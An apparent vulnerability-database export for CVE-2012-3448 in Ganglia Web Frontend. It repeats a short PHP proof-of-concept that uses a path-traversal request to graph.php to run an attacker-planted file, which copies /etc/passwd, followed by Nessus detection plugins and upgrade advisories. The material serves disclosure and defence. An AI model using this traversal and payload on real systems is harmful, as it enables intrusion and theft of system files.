Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit
2015-08-31T00:00:00
ID 1337DAY-ID-24175 Type zdt Reporter Andrei Costin Modified 2015-08-31T00:00:00
Description
Exploit for php platform in category web applications
<?php
/*
################################################################################
#
# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)
# Desc : CVE-2012-3448 PoC
# Details : This PoC will create a dummy file in the /tmp folder and
# will copy /etc/passwd to /tmp.
# To modify the attack payload, modify the code below.\
# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0
#
################################################################################
1. Assuming that ganglia is installed on the target machine at this path:
/var/www/html/ganglia/
2. Assuming the attacker has minimal access to the target machine and
can write to "/tmp". There are several methods where a remote attacker can
also trigger daemons or other system processes to create files in "/tmp"
whose content is (partially) controlled by the remote attacker.
3. The attacker puts the contents of this PoC file into the file:
/tmp/attach.php
4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1
as:
http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY
5. Confirm that the PoC created a dummy file in the /tmp folder and copied
/etc/passwd to /tmp.
*/
eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");');
die("Triggering CVE-2012-3448 attack.php");
?>
# 0day.today [2017-12-31] #
{"published": "2015-08-31T00:00:00", "id": "1337DAY-ID-24175", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T01:49:37", "bulletin": {"published": "2015-08-31T00:00:00", "id": "1337DAY-ID-24175", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 3.3, "modified": "2016-04-19T01:49:37"}}, "hash": "1d75add5187c9e7f8ee095b042d3534c795d4bcd2063bfd299d8575e5fea5cdd", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T01:49:37", "edition": 1, "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit", "href": "http://0day.today/exploit/description/24175", "modified": "2015-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": ["CVE-2012-3448"], "sourceHref": "http://0day.today/exploit/24175", "references": [], "reporter": "Andrei Costin", "sourceData": "<?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attach.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6ac4692fb63b7d7014a8bf5e3dd1dcbd", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1994b8292eeb0200beea67fc6984b4a4", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "718acde9080199fdcfde9fec17d66e4b", "key": "href"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "modified"}, {"hash": "60ae5c51b8229a1e8bb925d40217d710", "key": "sourceHref"}, {"hash": "64a7ce0d613028a50980b742a3ed8f09", "key": "reporter"}, {"hash": "c00e09b34bf53aa288e441a6a49ef7c0", "key": "title"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "a58e23fef570b306189524b16aa42ba2ec189aad00b59c4c8a6be9e8b9f16560", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-01-01T01:08:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-3448"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:133379"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2610.NASL", "FEDORA_2012-10727.NASL", "FEDORA_2012-10699.NASL", "GENTOO_GLSA-201412-10.NASL"]}, {"type": "seebug", "idList": ["SSV:89282"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140197", "OPENVAS:1361412562310892610", "OPENVAS:1361412562310103535", "OPENVAS:892610", "OPENVAS:1361412562310121296"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2610-1:D545E"]}, {"type": "exploitdb", "idList": ["EDB-ID:38030"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28982", "SECURITYVULNS:VULN:12850"]}, {"type": "gentoo", "idList": ["GLSA-201412-10"]}], "modified": "2018-01-01T01:08:44"}, "vulnersScore": 7.2}, "type": "zdt", "lastseen": "2018-01-01T01:08:44", "edition": 2, "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution Exploit", "href": "https://0day.today/exploit/description/24175", "modified": "2015-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": ["CVE-2012-3448"], "sourceHref": "https://0day.today/exploit/24175", "references": [], "reporter": "Andrei Costin", "sourceData": "<?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attach.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n\n# 0day.today [2017-12-31] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1994b8292eeb0200beea67fc6984b4a4", "key": "cvelist"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "2903b34697cae1ba83ae67a482376e2c", "key": "href"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "modified"}, {"hash": "0ceeaf156076e3c4058cd76410629fce", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "64a7ce0d613028a50980b742a3ed8f09", "key": "reporter"}, {"hash": "a597e50bcbab490ba97c28c6332adc8d", "key": "sourceData"}, {"hash": "e4f0fd435b67a5b3bcf01a07e0aada3f", "key": "sourceHref"}, {"hash": "c00e09b34bf53aa288e441a6a49ef7c0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"cve": [{"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.", "modified": "2018-08-04T01:29:00", "id": "CVE-2012-3448", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3448", "published": "2012-08-06T18:55:00", "title": "CVE-2012-3448", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:17", "bulletinFamily": "exploit", "description": "", "modified": "2015-08-31T00:00:00", "published": "2015-08-31T00:00:00", "href": "https://packetstormsecurity.com/files/133379/Ganglia-Web-Frontend-PHP-Code-Execution.html", "id": "PACKETSTORM:133379", "type": "packetstorm", "title": "Ganglia Web Frontend PHP Code Execution", "sourceData": "`<?php \n/* \n \n################################################################################ \n# \n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re) \n# Desc : CVE-2012-3448 PoC \n# Details : This PoC will create a dummy file in the /tmp folder and \n# will copy /etc/passwd to /tmp. \n# To modify the attack payload, modify the code below.\\ \n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0 \n# \n################################################################################ \n \n1. Assuming that ganglia is installed on the target machine at this path: \n/var/www/html/ganglia/ \n \n2. Assuming the attacker has minimal access to the target machine and \ncan write to \"/tmp\". There are several methods where a remote attacker can \nalso trigger daemons or other system processes to create files in \"/tmp\" \nwhose content is (partially) controlled by the remote attacker. \n \n3. The attacker puts the contents of this PoC file into the file: \n/tmp/attack.php \n \n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \nas: \nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY \n \n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \n/etc/passwd to /tmp. \n \n*/ \n \neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");'); \ndie(\"Triggering CVE-2012-3448 attack.php\"); \n \n?> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133379/ganglia-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-12-13T06:51:17", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web-based monitoring\nsystem, could lead to remote PHP script execution with permissions of\nthe user running the web server.", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-2610.NASL", "href": "https://www.tenable.com/plugins/nessus/63640", "published": "2013-01-22T00:00:00", "title": "Debian DSA-2610-1 : ganglia - arbitrary script execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2610. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63640);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:35\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_bugtraq_id(54699);\n script_xref(name:\"DSA\", value:\"2610\");\n\n script_name(english:\"Debian DSA-2610-1 : ganglia - arbitrary script execution\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Insufficient input sanitization in Ganglia, a web-based monitoring\nsystem, could lead to remote PHP script execution with permissions of\nthe user running the web server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/ganglia\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2610\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ganglia packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"ganglia-monitor\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ganglia-webfrontend\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"gmetad\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libganglia1\", reference:\"3.1.7-1+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libganglia1-dev\", reference:\"3.1.7-1+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:03:34", "bulletinFamily": "scanner", "description": "Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2012-10699.NASL", "href": "https://www.tenable.com/plugins/nessus/60122", "published": "2012-07-26T00:00:00", "title": "Fedora 17 : ganglia-3.1.7-6.fc17 (2012-10699)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-10699.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60122);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:11 $\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_xref(name:\"FEDORA\", value:\"2012-10699\");\n\n script_name(english:\"Fedora 17 : ganglia-3.1.7-6.fc17 (2012-10699)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/084202.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0192704c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ganglia package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"ganglia-3.1.7-6.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ganglia\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:03:34", "bulletinFamily": "scanner", "description": "Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2012-10727.NASL", "href": "https://www.tenable.com/plugins/nessus/60123", "published": "2012-07-26T00:00:00", "title": "Fedora 16 : ganglia-3.1.7-5.fc16 (2012-10727)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-10727.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60123);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 22:25:11 $\");\n\n script_cve_id(\"CVE-2012-3448\");\n script_xref(name:\"FEDORA\", value:\"2012-10727\");\n\n script_name(english:\"Fedora 16 : ganglia-3.1.7-5.fc16 (2012-10727)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for arbitrary PHP file execution\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-July/084196.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd45ba68\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ganglia package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"ganglia-3.1.7-5.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ganglia\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:33:48", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201412-10\n(Multiple packages, Multiple vulnerabilities fixed in 2012)\n\n Vulnerabilities have been discovered in the packages listed below.\n Please review the CVE identifiers in the Reference section for details.\n EGroupware\n VTE\n Layer Four Traceroute (LFT)\n Suhosin\n Slock\n Ganglia\n Jabber to GaduGadu Gateway\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, cause Denial of Service, obtain sensitive\n information, or otherwise bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-201412-10.NASL", "href": "https://www.tenable.com/plugins/nessus/79963", "published": "2014-12-15T00:00:00", "title": "GLSA-201412-10 : Multiple packages, Multiple vulnerabilities fixed in 2012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-10.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79963);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/12 17:35:38\");\n\n script_cve_id(\"CVE-2008-4776\", \"CVE-2010-2713\", \"CVE-2010-3313\", \"CVE-2010-3314\", \"CVE-2011-0765\", \"CVE-2011-2198\", \"CVE-2012-0807\", \"CVE-2012-0808\", \"CVE-2012-1620\", \"CVE-2012-2738\", \"CVE-2012-3448\");\n script_bugtraq_id(41716, 46477, 48645, 51574, 52642, 52922, 54281, 54699);\n script_xref(name:\"GLSA\", value:\"201412-10\");\n\n script_name(english:\"GLSA-201412-10 : Multiple packages, Multiple vulnerabilities fixed in 2012\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-10\n(Multiple packages, Multiple vulnerabilities fixed in 2012)\n\n Vulnerabilities have been discovered in the packages listed below.\n Please review the CVE identifiers in the Reference section for details.\n EGroupware\n VTE\n Layer Four Traceroute (LFT)\n Suhosin\n Slock\n Ganglia\n Jabber to GaduGadu Gateway\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, cause Denial of Service, obtain sensitive\n information, or otherwise bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All EGroupware users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-apps/egroupware-1.8.004.20120613'\n All VTE 0.32 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/vte-0.32.2'\n All VTE 0.28 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/vte-0.28.2-r204'\n All Layer Four Traceroute users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/lft-3.33'\n All Suhosin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-php/suhosin-0.9.33'\n All Slock users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-misc/slock-1.0'\n All Ganglia users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/ganglia-3.3.7'\n All Jabber to GaduGadu Gateway users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/gg-transport-2.2.4'\n NOTE: This is a legacy GLSA. Updates for all affected architectures have\n been available since 2013. It is likely that your system is already no\n longer affected by these issues.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:egroupware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ganglia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gg-transport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lft\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:slock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vte\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security 